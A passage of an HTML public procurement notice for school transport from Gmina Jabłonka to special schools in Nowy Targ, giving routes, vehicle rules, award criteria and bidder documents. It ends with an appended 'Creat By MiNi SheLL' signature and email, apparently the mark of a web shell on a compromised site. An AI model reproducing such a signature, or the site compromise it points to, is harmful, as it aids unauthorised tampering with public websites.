wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest „Dowóz uczniów z terenu Gminy Jabłonka do Katolickiej Szkoły Podstawowej SPSK,<br/>Szkoły Specjalnej Przysposabiającej do Pracy SPSK, Branżowej Szkoły I Stopnia Specjalnej SPSK w Czerwiennem oraz<br/>Szkoły Podstawowej Specjalnej Nr 9 w Zespole Placówek Szkolno-Wychowawczo Opiekuńczych w Nowym Targu w roku<br/>szkolnym 2023/2024”.<br/>2. Zakres rzeczowy zamówienia obejmuje wykonanie przewozu uczniów na trasach:<br/>2.2. Część nr 2 „Dowóz ucznia z terenu Gminy Jabłonka do Szkoły Podstawowej Specjalnej Nr 9 w Nowym Targu w<br/>Zespole Placówek Szkolno-Wychowawczo Opiekuńczych w Nowym Targu w roku szkolnym 2023/2024.<br/>Wykaz przystanków:<br/>a/ Lipnica Mała 181b,<br/>b/ Lipnica Mała 123, 508a, 565 (dowóz poniedziałek i piątek)<br/>c/ Jabłonka, ul. Potokowa 5<br/>d/ Zubrzyca Górna Zimna 540 B<br/>e/ przystanek ostatni Szkoła Podstawowa Specjalna Nr 9 w Nowym Targu w Zespole Placówek Szkolno-Wychowawczo<br/>Opiekuńczych w Nowym Targu (adres: 34-400 Nowy Targ, ul. Jana Pawła II 85) ) do wykonania 2 kursy dziennie (1- rano, 1- popołudniu)<br/>g) 1 kurs około 63,5 km, szacunkowa ilość kilometrów dowozów w dniach nauki szkolnej – ok 127 km/dziennie x 186 dni =<br/>23622,00 km<br/>h/ dowóz 6 uczniów + 1 opiekun na godz. 8.00, powrót między godz. 13.00-16.00 – zgodnie z harmonogramem zajęć<br/>lekcyjnych.<br/>Usługi przewozowe należy wykonywać zgodnie z ustalonym harmonogramem dostosowanym do planu nauczania danej<br/>placówki oświatowej.<br/>UWAGA: Wykonawca zapewni przewóz opiekunowi podczas przejazdu (tam i z powrotem) na trasie Nowy Targ – Jabłonka<br/>oraz Jabłonka - Nowy Targ.<br/>Dni dowozów w roku szkolnym 2023/2024 w okresie od 4 września 2023 roku do 21 czerwca 2024 roku – 186 dni przy czym<br/>gwarantowana ilość dni w których będzie świadczona usługa dowozu/odwozu, wynosi 93 dni.<br/>Dzienną liczbę przejechanych kilometrów w ramach wykonywania przedmiotu zamówienia ustal się na około 127 km na<br/>trasie do Czerwiennego oraz 127 km na trasie do Nowego Targu. Liczba kilometrów, o której mowa wyżej może ulec<br/>zmianie ze względu na zmianę przebiegu trasy w przypadku zgłoszenia (bądź rezygnacji) przez rodziców/opiekunów<br/>prawnych dzieci do dowozu.<br/>Długości tras przewozu liczone są od przystanków początkowych. Koszty dojazdu Wykonawcy do miejsca rozpoczęcia trasy<br/>i zjazdu po zakończeniu dowozu nie mogą obciążać Zamawiającego.<br/>W przypadku wystąpienia silnych opadów śniegu lub innych zjawisk atmosferycznych uniemożliwiających dojazd, w<br/>porozumieniu z Zamawiającym oraz Dyrektorem szkoły mogą nastąpić przesunięcia godzin dowozu i odwozu dzieci.<br/>W przypadku remontów, awarii, uszkodzeń mostów, dróg lub innych obiektów czego skutkiem będzie zmiana lub<br/>konieczność zmiany trasy przewozowych (w tym także wydłużenie trasy lub skrócenie trasy ze względu na zmianę ilości<br/>dowożonych dzieci), Zamawiający dopuszcza możliwość zmiany umowy i należnego (tak zwiększenia jak i zmniejszenia)<br/>wynagrodzenia na podstawie ceny ofertowej Wykonawcy za 1 km.<br/>Podana liczba uczniów ma charakter orientacyjny i może ulec zmianie w trakcie realizacji zamówienia (może ulec<br/>zwiększeniu lub zmniejszeniu).<br/>Opcja zwiększenia ilości dowożonych dzieci będzie miała zastosowanie w przypadku zgłoszenia przez rodziców/opiekunów<br/>prawnych nowych dzieci do dowozu.<br/>Wykonawca zobowiązany jest wielkość pojazdu dostosować do uwarunkowań przedmiotowej usługi.<br/>Cena oferty powinna uwzględniać koszt dojazdu do miejsca rozpoczęcia wykonywania usługi.<br/>Wskazano przystanki najdalsze – dzieci zabierane są na odcinkach pomiędzy przystankami.<br/>Wykonawca zobowiązany jest świadczyć usługi w taki sposób, aby czas przebywania uczniów w podróży był jak najkrótszy,<br/>a nadto winien uwzględnić to, aby przewożeniu uczniowie mogli punktualnie rozpocząć zajęcia lekcyjne i bez zbędnego<br/>oczekiwania na nie, a nadto aby po ich zakończeniu byli odwożeni bez zbędnego oczekiwania. Usługi przewozowe będą<br/>odbywać się najkrótszą trasą z domu do szkoły i po skończonych zajęciach lekcyjnych ze szkoły do domu.<br/>Świadczenie usług przewozowych polegających na dowozie dzieci i młodzieży niepełnosprawnej musi być wykonywane<br/>pojazdami specjalistycznymi dostosowanymi do przewozu osób niepełnosprawnych, w tym osób na wózkach inwalidzkich.<br/>Dostosowanie pojazdów do przewozu osób niepełnosprawnych oraz ich oznaczenie musi być zgodnie z obowiązującymi w<br/>tym zakresie przepisami prawnymi. Pojazdy, którymi przewożone będą dzieci muszą być w pełni sprawne technicznie,<br/>dostosowane do ilości przewożonych dzieci i posiadającymi świadectwo dopuszczenia do ruchu – wydane zgodnie z<br/>Prawem o ruchu drogowym. Pojazdy mają być oznaczone zgodnie z obowiązującym Rozporządzeniem w sprawie rejestracji<br/>i oznaczania pojazdów oraz wymagań dla tablic rejestracyjnych (Dz.U. z 2017 r., poz. 2355 z późn. zm.). Każdy pojazd ma<br/>posiadać ubezpieczenie OC i NNW, ma być utrzymany w czystości, sprawny technicznie. W zimie każdy pojazd ma być<br/>ogrzewany, odśnieżony, a wejścia do niego oczyszczone z ewentualnego oblodzenia, tak by były one bezpieczne.<br/>W przypadku wystąpienia awarii pojazdu lub w przypadku stwierdzenia przez Zamawiającego lub policję niesprawności<br/>pojazdu, która zagraża bezpieczeństwu osób przewożonych Wykonawca zobowiązany jest do niezwłocznego podstawienia<br/>pojazdu zastępczego do dalszej realizacji zamówienia. Pojazd zastępczy winien być podstawiony w czasie zgodnym z<br/>czasem podanym przez Wykonawcę w ofercie przetargowej. W przypadku przekroczenia tego terminu Wykonawcy zostaną<br/>naliczone kary umowne za nie przestrzeganie warunków umowy.<br/>Wykonawca zobowiązany jest posiadać w gotowości pojazd zastępczy, który może zostać użyty w przypadku wystąpienia<br/>awarii innego pojazdu, którym świadczona jest usługa dowozu.<br/>Wykonawcy ponoszą wyłączną odpowiedzialność za zapoznanie się z należytą starannością z treścią specyfikacji istotnych<br/>warunków zamówienia dostępną na stronie internetowej Zamawiającego.<br/>Przewóz uczniów do placówek szkolnych odbywać się będzie w dni nauki szkolnej, w oparciu o Rozporządzenie Ministra<br/>Edukacji Narodowej i Sportu z 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz. U. Nr 46, poz. 432 z 2002 r. z<br/>późn. zm.) z wyłączeniem przerw świątecznych i innych dni wolnych od zajęć wynikających z organizacji roku szkolnego.<br/>Wykonawca zobowiązany będzie zapewnić transport również w dni, w które uczniowie będą odrabiali inne dni zwolnione z<br/>nauki szkolnej.<br/>Dowóz będzie się odbywał w dni robocze wynikające z zajęć szkolnych<br/>Dowóz nie będzie realizowany w czasie ferii. Zaś w dni wolne od zajęć dydaktycznych dowóz będzie organizowany na<br/>życzenie rodziców (np. sprawdzianów, egzaminów oraz w inne dodatkowe wolne dni od zajęć szkolnych, itp.).<br/>CPV<br/>przedmiot główny:<br/>60100000-9 - Usługi w zakresie transportu drogowego<br/>przedmioty dodatkowe:<br/>60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">186 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się<br/>następującymi kryteriami:<br/>a) Kryterium „cena” (Kc) – 60 pkt<br/>b) Kryterium „czas podstawienia pojazdu zastępczego” (Kpz) – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy:<br/>􀀀 niepodlegający wykluczeniu z powodów, o których mowa w art. 108 ust 1 pkt 1-6 (Rozdział 14 SWZ) i art. 109 ust. 1<br/>ustawy Pzp w zakresie przewidzianym przez zamawiającego w niniejszej SWZ (Rozdział 15 SWZ),oraz nie podlegający<br/>wykluczeniu z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z<br/>2022 poz. 835),<br/>􀀀 którzy spełniają warunki o których mowa w art. 112 ust 2 ustawy Pzp na poziomie wymaganym przez zamawiającego zgodnie z opisem poniżej.<br/>2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym -<br/>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełnienia tego warunku.<br/>Zamawiający nie dokona oceny spełniania warunków udziału w postępowaniu<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów -<br/>Opis spełnienia warunków:<br/>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż posiada:<br/>- aktualną licencją na wykonywanie krajowego transportu drogowego osób.<br/>Informacje dodatkowe:<br/>- Wykonawca ma obowiązek posiadania stosownych zezwoleń, pozwoleń, zgód, zgłoszeń, koncesji, licencji itp. zwanych<br/>dalej „zezwoleniami” przez cały okres trwania umowy oraz ich okazywania Zamawiającemu na każde jego wezwanie. W<br/>przypadku, gdy którekolwiek z dotychczasowych zezwoleń wygasło lub zostało cofnięte w okresie obowiązywania niniejszej<br/>umowy, Wykonawca zobowiązany jest przedstawić nowe zezwolenie w tym zakresie, nie później niż w ostatnim dniu<br/>obowiązywania dotychczasowego.<br/>- Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art.<br/>112 ust. 2 pkt 2 ustawy pzp, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i realizuje roboty<br/>budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>W przypadku gdy, wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamawiający może żądać odpowiedniego zezwolenia, licencji, koncesji lub wpisu do rejestru działalności regulowanej, jeżeli<br/>ich posiadanie jest niezbędne do świadczenia określonych usług w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. O udzielenie zamówienia<br/>mogą ubiegać się wykonawcy:<br/>- niepodlegający wykluczeniu z powodów, o których mowa w art. 108 ust 1 pkt 1-6 (Rozdział 14 SWZ) i art. 109 ust. 1 ustawy Pzp<br/>- w zakresie przewidzianym przez zamawiającego w niniejszej SWZ (Rozdział 15 SWZ),oraz nie podlegający wykluczeniu z<br/>postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz. 835),<br/>W celu potwierdzenia<br/>braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego (na podstawie art. 108 i 109<br/>ustawy Pzp), Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia tj. (art. 274<br/>ust. 1 ustawy Pzp):<br/>1. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji - w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie<br/>zamówienia w okolicznościach, o których mowa w art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>- chyba że Wykonawca w Formularzu Oferty lub oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, wskaże dane<br/>umożliwiające dostęp do tych dokumentów samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy danych;<br/>Dotyczy również wszystkich Wykonawców wspólnie ubiegających o zamówienie, jak również w odniesieniu do podmiotów<br/>udostępniających zasoby<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca<br/>wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.<br/>1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, o którym mowa w Rozdziale 16 ust.3 pkt 1) SWZ – składa dokument lub<br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br/>a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokumenty te powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>2. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w<br/>Rozdziale 16 ust. 3 SWZ, w § 4 ust. 1 Rozp., o których mowa w art. 128 ust. 6 ustawy lub gdy dokumenty te nie odnoszą się do<br/>wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 ustawy, zastępuje się<br/>je<br/>odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo<br/>osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli<br/>w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone<br/>przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze<br/>względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>(...) CIĄG DALSZY zawierają zapisy Rozdziału 17 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający w celu potwierdzenia spełnienia warunków udziału w postępowaniu, wezwie wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych<br/>środków dowodowych, aktualnych na dzień złożenia tj. (art. 274 ust. 1 ustawy Pzp):<br/>2.1. Odpowiedniego zezwolenia, licencji koncesji lub wpisu do rejestru działalności regulowanej, a także dokumentu<br/>potwierdzającego status członka danej organizacji, jeżeli członkostwo w tej organizacji jest niezbędne do świadczenia usług w kraju,<br/>w którym wykonawca ma siedzibę lub miejsce zamieszkania.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ten warunek.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten/ dokumenty te składa przynajmniej<br/>jeden z wykonawców.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć następujące dokumenty:<br/>A: Wypełniony i podpisany FORMULARZ OFERTY -cenowy<br/>- którego wzór stanowi załącznik nr 1 do SWZ.<br/>3.1 OŚWIADCZENIE WSTĘPNE (art. 125 ust 1 ustawy Pzp),<br/>- załącznik nr 2 do SWZ w zakresie wskazanym przez Zamawiającego w Rozdziale 13 ust. 2 SWZ<br/>- załącznik nr 3 do SWZ w zakresie wskazanym przez Zamawiającego w Rozdziale 14 ust. 1 i Rozdziale 15 ust 1 SWZ.<br/>- w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o spełnieniu warunków udziału w<br/>postępowaniu składa ich pełnomocnik.<br/>3.2 ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów<br/>- wzór zobowiązania stanowi załącznik nr 4 do SWZ.<br/>3.3 OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCY SIĘ O UDZELENIE ZAMÓWIENIA (konsorcjum, spółka<br/>cywilna itp.)<br/>- wzór oświadczenia stanowi załącznik nr 6 do SWZ (jeżeli dotyczy).<br/>Uwaga: Oświadczenie ma być złożone wraz z ofertą (jeżeli dotyczy). Oświadczenie ma być podpisane przez każdego z<br/>wykonawców występujących wspólnie.<br/>3.4 PEŁNOMOCNICTWA<br/>Mają być złożone w formie oryginału lub kopii poświadczonej notarialnie (jeżeli dotyczy):<br/>a) w przypadku podpisania oferty przez osoby nie wymienione w odpisie z właściwego rejestru - pełnomocnictwo do<br/>podpisania oferty lub podpisania oferty i zawarcia umowy<br/>b) w przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli<br/>każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>- pełnomocnictwo może być sporządzone wg. wzoru stanowiącego załącznik nr 5 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5. Zasady składania oferty przez podmioty występujące wspólnie:<br/>5.1 Wymagane oświadczenia wskazane w pkt. 3.1 niniejszego Rozdziału SWZ powinny być złożone przez każdego<br/>wykonawcę wspólnie ubiegającego się o zamówienie 5.2 W przypadku, o którym mowa w art. 117 ust. 2 i 3 stawy Pzp,<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum, spółka cywilna itp.) dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (art. 117<br/>ust. 4 ustawy Pzp) - wzór oświadczenia stanowi załącznik nr<br/>6 do SWZ. 5.3 Wykonawcy składający ofertę wspólną zobowiązani są do ustanowienia Pełnomocnika do reprezentowania<br/>ich w postępowaniu albo Pełnomocnika do reprezentowania ich w postępowaniu oraz do zawarcia umowy w sprawie<br/>zamówienia - patrz: pkt. 3.4 ppkt b) SWZ.<br/>Dokument lub dokumenty zawierający ustanowienie Pełnomocnika stanowi załącznik nr 5 do SWZ) musi zawierać w<br/>szczególności: wskazanie postępowania o zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie<br/>o udzielenie zamówienia, wskazanie<br/>ustanowionego Pełnomocnika i zakres jego umocowania. Dokument (lub dokumenty) zawierający ustanowienie<br/>Pełnomocnika musi być podpisany w imieniu wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia,<br/>przez osoby uprawnione do składania oświadczeń woli, wymienione we właściwym rejestrze lub ewidencji wykonawców.<br/>Ustanowienie przedmiotowego Pełnomocnika może zostać zawarte w umowie o współdziałaniu złożonej wraz z ofertą.<br/>Dokument (lub dokumenty) zawierający ustanowienie Pełnomocnika musi zostać złożony wraz z ofertą w formie oryginału<br/>lub notarialnie poświadczonej kopii. Do dokumentu (lub dokumentów) zawierającego ustanowienie Pełnomocnika należy<br/>załączyć dokumenty potwierdzające, że osoba udzielająca pełnomocnictwa była upoważniona do reprezentowania<br/>wykonawców w chwili udzielania<br/>pełnomocnictwa (co można wykazać w szczególności przez załączenie odpisu z Krajowego Rejestru Sądowego lub<br/>informacji odpowiadającej odpisowi aktualnemu Rejestru Przedsiębiorców pobieranej na podstawie art. 4 ust. 4aa ustawy z<br/>dnia 20 sierpnia 1997 r. o Krajowym Rejestrze Sadowym (tj. Dz. U. z 2007 r. Nr 168, poz.1186, ze zm.) albo zaświadczenie<br/>o wpisie do Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej zgodnie z art. 46 ustawy z dnia 6 marca 2018 r. o Centralnej Ewidencji i<br/>Informacji o Działalności<br/>Gospodarczej i Punkcie Informacji dla Przedsiębiorcy (Dz.U.2020.2296). Elektroniczna kopia pełnomocnictwa nie może być<br/>uwierzytelniana przez upełnomocnionego. 5.4 Oferta wspólna składana przez dwóch lub więcej wykonawców, powinna<br/>spełniać następujące wymagania:<br/>a) Dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw wykluczenia, składa każdy z<br/>wykonawców składających ofertę wspólną we własnym imieniu.<br/>b) Dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe składa pełnomocnik<br/>wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną.<br/>5.5 Wykonawca, który powołuje się na zasoby innych podmiotów, o których mowa w Rozdziale 24 ust. 3 pkt 3.2 SWZ, w<br/>celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich<br/>zasoby, warunków udziału w postępowaniu, składa oświadczenia wskazane w Rozdziale 24 ust 3, pkt. 3.1. SWZ<br/>zawierające informacje dotyczące tych podmiotów.<br/>5.6 Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z Pełnomocnikiem.<br/>5.7 Wypełniając formularz oferty, jak również inne dokumenty, powołując się na wykonawcę, w miejscu np. nazwa i adres<br/>wykonawcy, należy wpisać dane dotyczące wykonawców wspólnie ubiegających się o udzielenie zamówienia, a nie<br/>Pełnomocnika tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia , zawiera Wzór umowy (z załącznikami), który stanowi<br/>załącznik nr 7 do SWZ (paragraf 15 Projektu Umowy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-28 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamowienia https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-28 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin rozpoczęcia realizacji świadczenia usługi: od dnia rozpoczęcia zajęć szkolnych w roku 2023 , tj. od 04.09.2023r.<br/>Termin zakończenia realizacji świadczenia usługi: do dnia zakończenia zajęć szkolnych w roku 2024, tj. do 21.06.2024 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com